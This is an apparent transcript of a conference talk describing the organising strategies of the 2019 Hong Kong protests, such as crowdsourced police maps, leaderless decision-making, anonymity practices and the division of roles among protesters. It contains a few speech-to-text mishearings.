was 60% for pro-democracy. But especially compared to what the districts had looked like before, this was an incredible achievement. And I also think this is one thing that's really important to recognize, that there's a lot of organizational work that went into this. So people put in a lot of time, a lot of work to make sure that people went out and would be able to vote. And that people knew who they were voting for. So here we are in December. By the count of the activist and writer Kong Tsung-gan, there have been 6,152 arrests at least. Possibly more. 921 people have been prosecuted. So there's an incredible backlog. And there have been 774 protests. That includes smaller ones. That was as of December 23rd. Since then, there have been several more hundred arrests. So we're probably getting closer, much closer to 6,500, 6,600. And that's why we are after seven months of protests in Hong Kong. This is somewhat depressing. But it's also incredibly impressive that people have been able to keep going for such a long time. These people who are going out into the streets are not just walking for half an hour or an hour and then go home and are like, oh, yeah, now it's fine. People are entering real battles with police and essentially running and hiding from police for some cases for hours. A lot of people have been driven to physical exhaustion. A lot of people aren't doing well mentally because it's incredibly depressing. There's a lot of anxiety. People are very scared of what could happen to them if they do get arrested. And so one thing that I want to now focus on is how they've been able to just keep this going for such a long time. Hong Kong is such a tiny place. And if you look at the resources that the Chinese government has access to and that the Hong Kong government has access to, how can a protest keep going for so long? I think I have a few answers. The first answer is that there are very clear demands that the movement has. The first is a complete withdrawal of the extradition bill. So the law that I was talking about earlier, that was fulfilled in September. The second is the release of arrested protesters without charges. So they're saying we want all those more than 6,000 people, those should be released, and they should be able to go home without being charged because they were trying to make their government listen to them because there is no other way you can get your government to listen to you if you cannot vote. The only thing you can do is you can go out on the street. The third demand is a withdrawal of the characterization of protests as a riot. This is a bit technical, but the basic gist of it is that there is a law that the British colonial administration introduced which allows police to classify a lot of protests as riots. It's like a pretty broad definition, it's pretty vague. And that if you're convicted of rioting, that carries up to 10 years in prison. So I think roughly a third of arrested protesters has been under 18. Imagine you're 14 years old and you're out on the streets and you find out that you could be charged with rioting and you're looking at a 10-year prison sentence. That's very scary. The fourth demand, which is one of the ones that has some of the most support in the population, currently at 72% as of December 8th, is an independent investigation to police brutality because people don't trust the government watchdog that is essentially staffed by people who the government gets to pick. There were a few international experts on that panel, not all of them resigned because they said this is actually a joke and we don't think we can do anything meaningful with this. So people want an independent investigation. I specifically did not include images of police brutality in my presentation, but if you think you can take the violence, I would urge you to go look them up. There's a lot of material online. Hong Kong Free Press has documented a lot of these cases and reports on the legal follow-up on them as well. This has not been good. And I think it's also something that the violence was especially disproportionate and shocking for people because people are used to being safe. People are not used to living in a country where the police just comes and beats them up or the police just put, like, stomps their foot on the head of an arrested protester who's already lying on the ground. They're not used to watching police just kick someone who's already on the ground. They're also not used to police arresting teenagers. So that's number four. And number five is real universal suffrage. This is currently at 70% support in the broader population. So the idea is essentially people say we want that democracy, that promise that you made us in 97 or what we think you, like that promise that we think you made us, we want that. And this is also something that has been strengthened especially over the past few months because until a year ago, maybe people thought it doesn't matter that much if I elect the government because things will be fine and most people are competent who are in government. But over the past seven months they've been watching a government that essentially refused to listen to any of the protesters and pretended like none of their demands were in any way politically legitimate. So now a lot of people who were fined a year ago are saying, well, now we need democracy because we've seen what happens if you have a government that doesn't represent the people it's supposed to represent. I think this is an important strategy because it means that everyone who goes out knows what they're protesting for. So since July people have been going out on the streets and saying these are the five things we want. This is what we want, nothing else. Notably, independence is not part of this list, although the Chinese government likes to say that the protesters are separatists. Independence is not a demand of the movement, it also has pretty low support in Hong Kong. But instead, because you have these five demands, it's very catchy, people have even come up with a protest sign. So whenever you see pictures of protests you will see people holding up their hand like this. Because they're like five demands and then they put up another thing and they're saying not one less. So that's one guiding slogan that they've been using. And it's been memed. Everything gets memed in the Hong Kong protests. So, for example, if you're disappointed with the new Star Wars movie, go to Hong Kong because there's a lot of very entertaining Star Wars content that includes protesters. So on the left you can see at the bottom again it says five demands, not one less. And the image on the right also has that in Chinese. Strategy number two. Bee water. This is an image by an artist that essentially, you've seen some of the images where people cover their faces to protect themselves against tear gas and protect themselves so they can't be identified. And so there was a week when people started drawing the pokemons of the Hong Kong protests. And this was an image for Bee water. Bee water has essentially been a guiding principle of the movement since the very beginning. And it's based on a Bruce Lee quote. He's a martial artist. He was in a bunch of Kung Fu films from Hong Kong. And he said, empty your mind, be formless, shapeless, like water. Now you put water in a cup, it becomes the cup. You put water in a bottle, it becomes the bottle. You put it in a teapot, it becomes the teapot. Now water can flow or it can crash. So the idea of Bee water is that you essentially accumulate and gather people in places unexpectedly and very quickly and you disappear as quickly as possible. There were scenes where protests of thousands in the center of Hong Kong just kind of like dissipated and disappeared into nothingness. This is how you can avoid police capture in many cases, right? Like you don't sit and you don't stay in a place like people did with Occupy Central in 2014. You leave once the police turns up. But you don't even have to wait for the police to show up to know that they're coming. Because what people have started doing is that essentially you get maps where you have scouting channels first where people, when they see police, they just submit a report to the telegram channel so there are bots where you can submit reports. You say, I've seen a police unit that's going here, from here to this place, that direction, this many policemen. And that gets posted on a telegram channel with a hashtag for the location that we're seen in. One person who I interviewed who is middle-class doing really well, I asked him what the protest changed about him and he said it really changed my frame of mind because now I got used to observing the deployment of police whenever I see it. I got alerted to a siren and once I see it, I will immediately send the info onto a telegram channel. These reports then also get turned into maps. So this was Christmas Eve in Hong Kong. So people got a white Christmas not because there was snow but because there was a lot of tear gas. And the reports that people sent in are essentially turned into a map that you can use to strategically avoid being captured by police. And also that, for example, some relatives of mine wanted to go to Hong Kong and they said, well, we're worried about going into areas of protest and I was like, well, you can use this map and you can see really easily into which areas you really shouldn't go. Basically, if there are a lot of icons in a place, that means a lot of stuff is happening there. If you have the puppy logo, that means police units, cars, police cars, you see some water drops kind of like in the middle towards the left. That means there's a water cannon right there that you probably want to avoid. And there's also different signs for the different police units. So they're raptors and those are portrayed as the dinosaur logos. And in addition to that, you kind of have the, you know at what time the report was submitted, you can verify a report. You see further down towards the lower part of the map, there's a camera sign and so that means that there are live feeds from that place. So if you want to know what's going on in a particular place, a lot of Hong Kong journalists are live streaming the protests and so you can go and just watch a live stream to see what's really happening on the ground right there. And there's even a website that compiles up to nine live streams at the same time. So you can just like watch all of them at the same time on your screen to make sure you know what's happening. These maps are extremely useful and there's no way of saying how many people they've helped in avoiding arrest. But one friend of mine who was talking to, who went out to protest in July, said that he was going home from a protest and he was wearing the distinctive black shirts that protestors usually wear. He didn't have any change of clothes and he wanted to avoid arrest and he told his friends. And so within a few minutes, they sent him a screenshot of Google Maps where you could just see where he, like they had just shown him this is your escape route. Just going around all the police units that they could see on the map using only open sourced, crowdsourced information that was all made freely available online and that people put on maps like this. I think it's worth clapping for, like because these are people's lives, right? If there are only 10 people that got to escape police arrest because of these things, we don't know to how many years those people could be sent to prison. They could just be sentenced to fines, maybe they could send us to prison in three years. But all of that is time, like all of that is time in people's lives and the lives of people who have been going out to protest. And all of that was saved thanks to people crowdsourcing and open sourcing all of this information. And that's an incredible effort that people have been making for months now and an incredibly important institution that really has helped people. The next part of B-Water is decentralized decision making. One of the reasons I talked about the history of Hong Kong protests before and all of that political stuff is because I think it's very important to understand where people are coming from. People of all ages are protesting, but it's really young people who are disproportionately against the government and against the bill. I think earlier in June or July, the numbers were that 59% of people under 16 opposed the extradition bill. That's almost 100% amongst people who are not even eligible to vote, not even close to being eligible to vote. But these people have also been protesting for a very long time and they've also learned from the past. One thing that they've learned from 2014 is that if you're a leader, you get arrested and you get put in prison. Joshua Wong, who you may have heard of, is one of the people that happened to. Another person that happened to is Edward Long, who was a leading figure of the fishbowl riots in 2016. He's currently still serving time in prison. But how do you organize a movement without having political leaders? Well, you do the whole crowd intelligence thing, right? Like you start having grassroots decision making, you have a leader's movement. Hong Kong is not the first time this has happened. The Gize protests in Istanbul in 2013 were doing something similar. And now it's happening in Hong Kong. So if you have no leaders, you have nobody who the government can arrest to cripple the movement. They can maybe arrest one person, they can arrest 100 people, they can arrest 6,000 people, but all of those people are only drops in the bigger movement and in that wave that we were talking about earlier. So how does political decision making work if you have thousands of people? So there are telegram groups primarily, and there's also a forum called LIHKGE that's a bit like Reddit. And people just have political discussions on those. In addition to that, people often have groups on WhatsApp, people have Facebook groups. Like my parents are probably not on telegram, but kind of like the equivalent of their generation has groups on Facebook. And that's where people are talking about what they think should happen, about strategic questions about questions in terms of what their aims should be. So it's just kind of happening on all these platforms. And so if you have an idea or if you have an argument that you think is important, you share it, and if people agree with you, they start sharing it further on. So decision making has kind of like a snowball effect where you can see once you are in different groups, like arguments that people agree with keep reappearing in 10, 15, 20 groups, or people start rephrasing them. And so that's how kind of like consensus is often being built. At the same time, if you have an idea for a really cool protest action, such as you want people to form a human chain across part of Hong Kong, which is something that they did, someone just came up with it and posted about it online. And then someone made a poster for it. And more people made posters. And lots of people said this is a great idea. And so they just did it. I hope that especially hackers can empathize with this idea that someone has a cool idea, does it, and then people recognize that it is cool and kind of go along with it. And that's how a lot of the movement has been working for the past few months as well. Another example of this is the December 1 protest where thousands of people came out because and someone just like basically the equivalent of a Reddit user in his 20s had just said, well, I thought we should try to have a protest again. And all of a sudden the government actually gave him permission and there were thousands of people again out on the streets because anyone can register a protest. One thing that's hard is decision making. Some of these groups have thousands of people. I think I'm in several telegram groups that have maybe 60, 70,000 members. So often people use polling to essentially make decisions. I don't know whether you know the poll function in telegram basically the admins can send in a poll and say these are your four options. Do you think we should do A, B, C, or D? And then just kind of vote. And that's how a lot of the especially decision making and discussion on demands or deadlines that were people were trying to set was happening earlier in the movement. But it's also something that people can use if they need to make strategic decisions quickly on the spot. On August 12, people occupied the Hong Kong airport which is an incredibly important international hub and where they managed to basically just paralyze the entire airport. The Hong Kong government announced that day that flights would stop taking off at 4 p.m. And there started being rumors that the government would or the police would essentially come in and start clearing out the airport violently with tear gas. And police was deploying increasingly more people towards the airport. And because you have all these telegram channels, right, like you see people take pictures of police, they post them and you see oh my God, there's all this police coming towards the airport. I am here. They cut off the metro so you cannot take the train back into the city. The Hong Kong airport is on an island. You cannot get away from there. And so there was a lot of heated discussion back and forth that day and people were discussing is it safe, is it not safe. And ultimately there was one channel that had I think 60,000 followers and the admins kept asking, should we stay or should we go? And the ratios kept changing towards leaving and suddenly it was 70 to 30%. And people were like, okay, this is it, we're leaving. And that was kind of the moment when you could see people changing their mind like right on the spot. There was nobody who said we're now leaving, not the single person who said we're now going back, but just thousands of people who were watching and who said this looks too dangerous, we need to stay safe and we need to go home. The result of that was a mass exodus where people literally walked for hours as you can see on this picture just across streets because buses were full and stopped running, the metro had stopped running but they needed to get back home. One of the funniest things I think that I have heard of as part of the bee water and grassroots discussion strategy, I was talking to Xi Fan Yang who is the China correspondent for the German paper, and she was reporting from a small group building street blockades in Hong Kong. They were practicing grassroots decision making in person. They build a blockade, they hear police is coming so scouts are telling them they're leaving or they run into the metro but they need to know where they're going next because there's no plan. Because if you have no plan, the police can't know your plan and can't wait for you there but also you have no plan. So you have five people, ten people who are just shouting at each other on the metro platform. Someone says we want to go here and another person says we're going there and maybe after five minutes of shouting they decide okay, we have reached consensus, swarm intelligence. But it works. It's chaotic but it works because it really makes it hard to figure out where people are. Another really hard thing of this whole grassroots decision making and bottom up decision making has been how do you correct course? If you make mistakes, how do you correct those mistakes if there's nobody who can tell someone they need to stop doing these things. Again, this was something you could observe during the airport protests where people occupied the entire departure hall and at some point, like they said, I think they said it was a citizen's arrest but they basically tied a person to a luggage, to one of those luggage carts who they thought was an undercover policeman from China and beat that person up. I think he was a lot of way in the end but it was incredibly ugly scene and really when you were watching it I felt a lot like mob violence. But what happened after and a lot of people were saying this is a sign that this whole movement thing is not working and you cannot actually change anything about your behavior. Nobody can tell these people they need to change your mind. What happened afterwards is you saw the same thing I was describing earlier. People saw this was bad and people agree that it was bad. People were going around and everyone kept encouraging everyone else you need to be careful, don't use violence. If you think someone is an undercover cop who is spying on you, you can't just beat the person up. Afterwards there was one scene where people ran into someone who they thought was maybe a cop from mainland China and instead of beating him up, they all stood around him and started taking selfies with him. In addition to that, you have also seen increasingly you see people kind of taking, drawing people, like pushing people, pulling people back. And so people saying, well, this is something you can't attack this person. So if there's a person who's tempers maybe running really high, often there will be people around that person who say no, we're going to pull you back. People try to write guidelines. They say you need to be careful about journalists, don't accuse people of being fake journalists. So all these things. So there was a lot of self-correction and self-control coming out of that moment. I thought that was really interesting and really important because it was one sign that course correction can happen even if you have thousands of people. But it requires everyone to participate and it requires people to be willing to essentially interrogate the things that they had done and to also possibly admit mistakes. Strategy four, anonymity. Again, I think maybe something that hackers can empathize with. I know there's as usual a lot of talks about how to maintain your security and anonymity online. For people in Hong Kong, this has become incredibly important. The thing about feeling like your political system is being eroded and all the security and certainties and rights you had disappearing slowly is that you don't know one's line has moved. So you don't know anymore. A lot of people I've spoken to don't feel like they can speak politically online anymore. So they don't know what the consequences are going to be. Instead what people do is they start changing their names on their Facebook accounts, for example, because something that they would have said openly like a year ago, they no longer dare to say under their own name. They're people who have been fired probably for the things that they said on Facebook, such as the person who was a union leader with the Hong Kong airline. And anonymity is enforced both in person and online. Also, again, through a lot of kind of like community control and people supporting each other and essentially enforcing these rules with each other. Online, it's very much a social rule. So if you're kind of like in a working group on telegram and people are starting to chat kind of about personal stuff, then usually there will be someone who tells everyone else no get back to work, stop talking about that stuff. You're just closing too much about yourself. One phrase that people keep using as they say there are ghosts. So the operational assumption is that in any group there will be someone who is listening. So you, especially in these bigger groups, you cannot ever assume that there is no police in there. So you can do your work, but assume that you're being watched while you're doing anything that you're doing. Another thing that they're doing is that there are several channels that are dedicated to cybersecurity. And there's one channel, for example, that started passing around kind of like JPEGs that had instructions for how to set your telegram settings. Because you need to assume that a lot of the people you're working with don't have a lot of interest necessarily in technology and maybe have as the highest priority going out to protest. And so it helps that there are easy rules, right? So people send around these instructions that say you toggle these things on your telegram settings, make sure that ensures that nobody can see your phone number who isn't already a contact of yours. Or you change this thing and that means that your account essentially self-destructs if you're inactive for seven days. So that's how you do it. So in many ways, a lot of this is about the social enforcement and also breaking things down and making them as accessible as possible. Another thing is that there's a telegram account that alerts people to people who have been arrested. And the operational assumption is that if you've been arrested, you're compromised. And so it posts the names and the telegram handles of people who have been captured by police and tells people, delete this person's contact. Like, delete this person from all of your chats. Like, you cannot also be compromised. So that's another way they're trying to kind of like maintain that very basic security. I don't know how well this is working, to be very honest. I haven't really heard any reports of people who have been arrested for stuff that they've done on telegram. But that might also just be that it hasn't been reported or we don't know about this. It's also possible that the police has been just very busy mass arresting people at protests and that they have all this data and they might be watching people and might come back around to that later on. Sometimes people have actually been able to identify the telegram handles or think they've been able to identify the telegram handles of policemen, which led to several people being kicked out of groups. But again, so people are like, the police is probably watching, but we don't know how much information they have access to. In real life, you can see kind of in the lower right corner the usual outfit that people are wearing. These are frontliners who tend to be more directly involved in clashes with the police. But people will cover their faces with usually gas masks, sometimes just simple surgical masks. They're wearing goggles and heart heads to protect against projectiles, pepper spray, water cannons, tear gas, the things you encounter in the streets of Hong Kong these days. In addition to that, people have all of these umbrellas which they use to hide each other's identities. For example, if people are building a street blockade, then you always have some people who are building the blockade, and there's other people who are holding up umbrellas to prevent them from being photographed. Especially given how much covered the protests are, this is especially important because there's reporters and media around all the time, and people want to make sure that they don't accidentally end up on camera while committing what is probably a crime. There's other ways this is being used as well. For example, when people were destroying cameras in the metro stations in some cases, because people were very aware of the fact that they were being filmed by someone who they couldn't talk to, so people have asked individuals to delete pictures and videos when they've seen them film them, but they've also destroyed essentially these cameras on the metro. And again, then you will have someone cover you with an umbrella to avoid a person being filmed in the middle of essentially committing vandalism. The other thing is that people have this kind of uniform, which you can also see here, so people are essentially wearing black for the protests, which also means that you have no recognizable marks on yourself in the moment. And then when you practice bee water, if you hear police is coming, you go into a side street. Often there are people who are not participating in the protests personally directly, but who, for example, donate regular clothing that basically close, like any clothes that aren't black. This was particularly in the summer when you had these mass protests, people would just bring t-shirts into metro stations, so people were often leaving with the last train. And so people would just rush into metro stations, you kind of see people changing inside streets to make sure they get out of this very recognizable black year, and to essentially change into these clothes. So Hong Kongers have basically managed to build the world's largest black block, which is another way of maintaining anonymity. The government recognizes that this is a problem for them, and they tried in October to address this by implementing a mask ban. So the mask ban itself says that anyone who wears a mask at a lawful rally or a march, or an unlawful or unauthorized assembly, or during a riot. So even if you go to a peaceful protest, but you cover your face, you can be sentenced up to one year in prison simply for trying to hide your face. This is a law that was implemented under the emergency ordinance, which essentially is kind of like a national security law that gives the government sweeping powers in particular emergency situations. It is currently unclear to what extent this is constitutional. So this mask ban has been challenged in court multiple times, and it's currently still making its way through the courts. But it's also possible that basically Beijing might come in and say we have the ultimate right to interpret the Hong Kong basic law, so we will say that this law has to be constitutional. So this is something that we just need to wait out, but I think it's a sign that the government wants to essentially limit people's ability to maintain their anonymity, and people were really pissed at this. This was announced on a Friday, just kind of like during the work day. And in the afternoon, once people got off work, people went out on the streets. People were just like turning up, like school children in their school uniforms, people in their office clothing, just everyone put on a mask and was like, we want to keep this right, because that day at midnight, the mask ban was supposed to be implemented. So you had less than 24 hours notice, and it went into force the next day. Strategy five, division of labor. This again is something that I think is very interesting and uniquely Hong Kong, very uniquely Hong Kong, like the water strategy. So there's this idea, climbing the hill in different ways. This is again a lesson that people learned from 2014, because post 2014 and also into 2014 itself, one of the biggest weaknesses of the pro-democracy movement was that there was a lot of internal division. People really disagreed over tactics, and there were fights over who was leading the movement and who should be listened to and what the right strategy was. People have now kind of gone to the opposite extreme, but people are saying whatever you do, everyone is climbing the mountain, so everyone's trying to get to the top, and everyone's using their own ways of getting there, and everyone's using their own path essentially, hence the mountain imagery. I think one example that really illustrates this very clearly was a person who's kind of middle-aged and works in the finance industry in Hong Kong, so they're very well off, have profited from the system as it exists, but also support the protests, and they said, I did not get involved in the protestor's destructive actions, and I would never, but I will try my best to give them more support in delivering materials, donations, and my presence. So you can see that there's a very clear differentiation between the goal that people have and kind of like the methods. Like there's a lot of people who say I disagree with those methods, but essentially I will not undermine people who are working towards our same goal, the five demands, in different ways. This is also something that's notable because in 2016, violence was something that was condemned. I cannot speak to that many other contexts, but for example in the US where I study, and similarly in Germany, once protestors use violence, even if it is just destruction of things, often there is a lot of pushback and people say that has delegitimized you. This is something that is not really working that well in Hong Kong anymore. So there are clearly people who disagree with vandalism, and also there are people who are against the protestors because of vandalism, that's very clear. Based on the polls, I would say maybe 30, 40%, they have to check the exact numbers, but there are a lot of people who say even if I disagree with you, I will still support you because our overall goal is what is most important. I want to give two examples quickly of how this can work. So one example of this is that people have gotten an increasingly economic understanding of how politics works, rather than saying we just want to change laws. They also say we need to attack, for example, we need to hold accountable companies that are supporting the government, and we need to make people and government supporting companies feel the pain for essentially their political support for them. So people have started boycotting stores that don't support the protests, and again this is something that is all collected online where you have these incredible resources where you have entire maps, so you can make these custom Google maps, so there are custom Google maps that tell you which stores in Hong Kong support the protests, and there are entire lists for different sectors, for example, for food, it says these stores are for us and these stores are against us, and one of the people I spoke to was incredibly amazed at this. They are almost 40 years old, they have lived in Hong Kong for a long time, and were often very frustrated with how unpolitical the city was, but they said now it's the exact opposite and everything has become political, so they said wherever you get your lunch, where you get your coffee, even what kind of public transport you take, everything is not political and everything you use to show which political side you are on. And the idea is really to essentially hurt stores that much, that it becomes unviable to be against the protest movement economically. Some people also use the lists for essentially vandalism against stores, this has been seen with for example Starbucks because the people who own the Starbucks franchise in Hong Kong have very vocally opposed the protests, so in some cases that means also hurting them financially by throwing in windows. Another example was the same person who I spoke to, by the time I spoke to them a couple of weeks ago, stopped going out to protests, and this really surprised me because I met them during the protests in 2014, and I thought if there was one person who is middle aged and who would still go out, then that's you in terms of the people who I know, but they were like, well, I decided that I have different skills and that my design skills are something that I can use better in a different place. And so because at the time people were already working towards the district council elections, and they were still working, I don't know what, like 60-hour weeks or something crazy, but they decided that they would start working with a campaign for one of the people who was a candidate for the district council, who was a person who had never been in politics before, and this interview was like, well, I can help this person, I'm going to be able to help them get elected, and so they went essentially to social media and a lot of campaigning and designing for them, and that's kind of like a good sign, like I think that's a good example for the different types of effort that went into that district council election victory as well, right? So there's all these people who made a choice that this is something that they care about, and that again, they're all climbing the mountain in different ways, and these people decided that their way is supporting local politicians to get elected into the district councils. The other thing is that this division of Labour doesn't only happen in terms of what you choose that you're doing, but that's also an incredibly sophisticated and very well-defined division of Labour, so this is kind of like a representation of kind of what the movement is supposed to be like, so there's this idea that we're all Hong Kongers and we're all part of this movement and it doesn't matter what we're doing, we're all part of the same thing, and so that's kind of like a diversity that gets represented a lot, and that kind of appears in a lot of protest art as well. The most distinctive group that you've definitely seen are front liners, so these are people who wear kind of like the most recognizable uniform, they're all in black, so they cannot be identified, they wear a gas mask to protect themselves against pepper spray and tear gas, goggles for the same reason, hard hats, they often have gloves to be able to grab tear gas canisters that are being thrown at them, in some cases they have water bottles to extinguish the tear gas canisters, to essentially avoid being affected by the tear gas itself, and this is kind of like how you signal that you're in some, they're called, sometimes they're called the braves, but essentially this is about as radical as you can look as part of the Hong Kong protest movement, these are the people who are going to be in clashes with police, you can see that one of them is about to probably grab a brick, but these are front liners. One particular type of front liner are the, I'm missing the English word right now, basically the people are supposed to extinguish fires usually, firefighters, yes, sorry, firefighters, except instead of fighting fire they're fighting tear gas, and so on the right you can see someone from an incredibly iconic scene where someone used like a metal tin that you usually use to steam fish, and he extinguished the tear gas with water and put the metal tin on the tear gas, and people were making fun of how protest-ready people are by having your regular Chinese kitchen. On the left, this is a reference to a strategy that people have been using where essentially they put a traffic cone on the tear gas canister the moment they find it, so one person holds the traffic cone, one person puts water in at the top to extinguish the tear gas, and then some cases people put it into plastic bags that are filled with water to extinguish the tear gas, and in some cases throw it back at the police, and I think I have a video of this happening actually. It's also, you can see that I didn't do this for the first time, right? So they've been doing this for a while, and it's sad in many ways that these are young people who have to do that and feel that that's a thing they need to do to be heard, but it's also something there was a video out of Chile a couple of weeks ago where essentially Chilean protesters were using a similar strategy to extinguish tear gas, and someone who was apparently from Chile posted it somewhere saying thank you, Hong Kong, so they clearly there's been some like, oh, let's see how we can adapt these strategies for what's happening in Chile itself, which I think is an important thing to look at as well, because in some ways Hong Kongers have learned from other places, but also now people are looking at Hong Kong and looking at these strategies and adapting them in other instances. Another important group are peaceful protesters. I'm very thankful that someone memed all of them, all of the important groups, so I have these like standard images that I can use, and this is really the only thing that you kind of like need for, like a peaceful protestor, yeah, I just need a surgical mask, maybe a hat to protect your identity a bit more, and that's it, you just need to go out on the street. These are the people who frontliners in many ways feel like they're defending. When I was talking to a few people who are still in high school and who essentially are frontliners and who've been in clashes with the police directly, and when I ask them why they're doing it, they're saying I don't even know whether we can get our political aims, but the very least I can do is I can be one more person who is there and the police advances, I'm going to be one more person who can make sure that the police doesn't get to the peaceful protesters behind me, because they're not equipped to deal with tear gas and they're not equipped to deal with pepper spray, so I will be here and I will give them enough time so they can retreat and go home. But there's a lot of kind of like lionization of frontliners because they're kind of like the heroes of the movement in a way, they're the flashy heroes, but also everyone knows that the movement is not going to succeed in any way and it wasn't able to keep going because just of frontliners, right? So peaceful protesters are essentially the heart of the movement as well and the people who keep coming out in numbers. So there's a lot of reminders that we all need to work together, this is kind of this idea of we cannot be divided so it goes back to this idea, we all climb the mountain in different ways, right? So we're all important. And in both of these kind of like pieces of art you can see now, you can see the recognizable frontliner on the left in both cases because he has the hard hat and a bit more gear, it's kind of like ready to get into a fight with the police, but next to the frontliner you in both cases have someone who just put on a mask, maybe came straight from the office, maybe straight from school and those people are working together because if you had only one of those you probably wouldn't be able to keep going for half a year. Another group that I think is really interesting is Logistics because people have now adapted all these strategies to how they can kind of like deal with the things that police is throwing at them. So a year ago or even a couple of months ago, tear gas was still something that kind of like made people leave and made people go away, water cannon would scare people away but people have really adapted and tear gas doesn't do that much in Hong Kong anymore to be very honest. One person who is 19 and who I talked to and it was like doesn't the tear gas sting? They were like well the first time, yes, but then you get used to it and you just keep going. And to do that you need kind of all this gear, right? Like you need to be equipped, you need to have hard hats, you need to have all these umbrellas and so there are people kind of like in the background who are collecting material near big protest sites where they know there will be protests and they are carrying them kind of like in cartons in some cases they are collecting different types of shields and so when it comes to clash with the police they make sure that stuff gets passed on to the front lines. I didn't include it in the presentation but there are incredible videos of in some cases maybe a kilometer long human chain where you just have like tons of peaceful protesters like passing things on to make sure that things get to the people who are in the clash with police and logistics are the people who make sure that the stuff is around and is kind of like at these collection points and is then given to the people who really need it. It's also one person I spoke to who did a lot of logistics said I was, I'm not someone who would fight with the police in this movement but I still want to give some help and so I decided to manage resources such as medical resources or protest gear and so medical resources for example might be like saline solution which you can use to wash people's eyes out if they have been affected by pepper spray or tear gas and so this is someone who said I am not a front liner and I'm not going to be part of that but I will be right there. I think these people are doing important work I'm going to do exactly what I can, what's in my power to make sure that they have what they need. First aiders are incredibly important in the movement as well because people have started to mistrust hospitals a lot because people are worried that the government might go and get their hospital records so if they get injured as part of a clash with police that might include getting beaten up by police. There have been people, there was one person who was shot in the chest and who tried to run from the police almost succeeded but then was arrested but so if someone like that doesn't trust them to be, doesn't trust the hospitals, doesn't go to a hospital, first aiders are the ones who are going to treat those injuries so these people are around, are visibly marked as first aiders and make sure that people get as much medical treatment as they need to the extent that they are able to. There was one incredibly hard situation for them I think in November when people were occupying the Chinese University of Hong Kong and there was a real battle where you basically had a front line like you kind of see it in like movies where someone is trying to take in a castle or something like that so you had a real battle line where people kept getting hit and injured and first aiders kept running in and out grabbing people and carrying them to a big sports field that was just full of injured people where they were treating all of them and all of these are volunteers. There's more people in the background and I could keep going about this, my friends will be able to attest to the fact that I can talk about this for an hour or longer. I think one other group of people that I wanted to quickly talk about are the people who drive like the school buses. School buses are code for cars that go to protest sites and pick people up. So for example, when all people were stuck at the airport you could see that literally thousands of Hong Kongers grabbed their own cars and just drove out and said we will pick people up. They post on telegram and say hey, I'm a parent, I'm going to pick up my children, I have space for three people. And then there's also code for, so this is why I use that image because it's like the parents taking care of the kids. It's a very wholesome imagery. And they have this code essentially by saying if you say that you have stationery in your car that means that you have clothes to change in. If someone is wearing all black you have some other clothes they can change in. So there's entire telegram channels where just every post is just someone going from A to B. It says when they're leaving, it says how much space they have. It also often says if there's a female driver so people can feel safe. And to make sure that you don't get accidentally picked up by undercover cops, people are maintaining an unofficial database of cars that have identified undercover cop cars. And so there's a telegram bot. So these posts, once you have someone's license plate you go to the bot and you're like is this a cop and the bot will tell you yes or no. In addition to that you have thousands of countless working groups where people are just kind of working around the clock. This is an example of a PR translation working group that basically translated this particular poster from originally Chinese into a bunch of languages. One of them is German on the left, another is Korean on the right. It says Hong Kong is facing a human inherent crisis. What I think is interesting about this is that some of these groups are basically working around the clock. So if something happens in Hong Kong during the day, by evening often protest art comes out that is reframing an incident or trying to explain what protestors did if they feel like they need to explain themselves. And then Hong Kongers sleep. People who live in Europe, but who many cases are still from Hong Kong, and people who live in the United States work through their evenings and through their mornings. So by the time Hong Kongers wake up they often get these, like, can have these messages in different languages. And so this happened during the airport protest where on the 13th of the morning people just woke up and had posters in like 10 different languages that explained what was happening on Hong Kong, printed them and went to the airport straight away at 8am. I want to share one more story because I think this is really one of the most gut wrenching examples of what people have been able to achieve just by cooperating and also by being completely anonymous together, where during the siege at the polytechnic university in Hong Kong, so when hundreds of people were stuck at the university and didn't want to go out, Susan Satellin reported for quarts that there was at least one person and probably more who managed to get out from the university through the sewers. So this person went down to the sewers waiting through probably kind of like chest high wastewater in the dark not knowing where they were going. And then actually were able to escape the university that way. Because they were talking to people on telegram who had dug up maps of the Hong Kong switch system and directed this person. They were telling them this is where you go, you hit kind of like a crossroads and then you take a left, this is where you take a right. And so in the last moment, actually their plans were changed and so they were told you cannot go to the exit. We initially told you because we've seen police there, right? Telegram channels again, like all of this comes back together. So they're watching police movement and you cannot go there, there's police there, instead we need to send you to a different exit. So he goes to that exit and there's someone there waiting for him who lifts the lid, lets him out of the fucking sewage system. And then there's people waiting for them there, a school bus who grabs them and takes them somewhere else and that's how he got out of the university. And he still doesn't know any of those people. They're all still strangers. So they're like, okay, I'm going to go to the exit. The strategy number six that I think is important are counter narratives. So the Hong Kong government and the Beijing government have a very clear framing for how they want to frame the entire protest, right? So they want to say these are vandals, these are rioters, they have no legitimate demands, they just want to destroy things. Everything about them is legitimate or democratic or politically justified in any way. People realize that maybe memes are nice, but memes are maybe not enough. So part of the movement actually started creating a citizens press conference where people anonymously basically hold a press conference and you can see that press is coming there, right? Because you have all these, you have all the official mics and so all these media outlets are actually going there and talking to them. In the background you have someone doing this into sign language because they essentially know we need to at least somehow try to get control of the narrative again ourselves to make sure that it's not just the government who gets to define what is happening. The last strategy that I want to talk about is related to both counter narratives, but also to organizing and mobilizing, which is the last thing that I want to talk about. So as an introduction to that, I want to show you a video that in many ways I think demonstrates some of the capacity that people have been able to build. What I'm going to show you is a purchased anthem called Glory for Hong Kong. As I said earlier, Hong Kong was a city that was first under colonial rule by the British and now is now under rule by China without people really getting a choice at any point. And so in early September, people crowdsourced an anthem for the city online and someone composed it and published it on September 11th. And several days later, someone had arranged it for an orchestra and right after that, this video went online. So for the photo photo, there's probably no proof in there as that could simply be a wall or a speech. A song But it is the biggest change in the world our creation I think everyone who is interested in the meaning of that song, I would recommend that you go and read Vivian Chow's article about it in the New York Times, because she wrote from a musical and cultural perspective about what it meant for her to have grown up in a city where there was never a song that she identified with, and for this to be the first time there was kind of like an anthem for what she considers her home. So yeah, I would recommend you all go and read that. In the long term, a lot of the strategies that I talked about have been able to sustain the movement and have been able to help people, individuals, evade arrest in the short term, but the question is how sustainable this entire movement is in the long run. I think the orchestra is like, it's like a fun, they call themselves Black Bloor Orchestra by the way. It's a fun example of how people can just get tons of people together and suddenly come up with an entire orchestra and film that entire thing with a pretty good production value. I just downloaded a shitty version. So that's happening, right? People are building all these groups, building all these new ties. A lot of times they're building these ties with people who they don't know and who are anonymous to them, but in a lot of other cases, one person who I spoke to said that essentially they've started exercising together as a neighborhood because he says that we cannot trust the police to save us and if someone from the government comes to attack us, we want to be able to defend ourselves. So then he's also organizing this in small neighborhood groups. So there's all these people who have 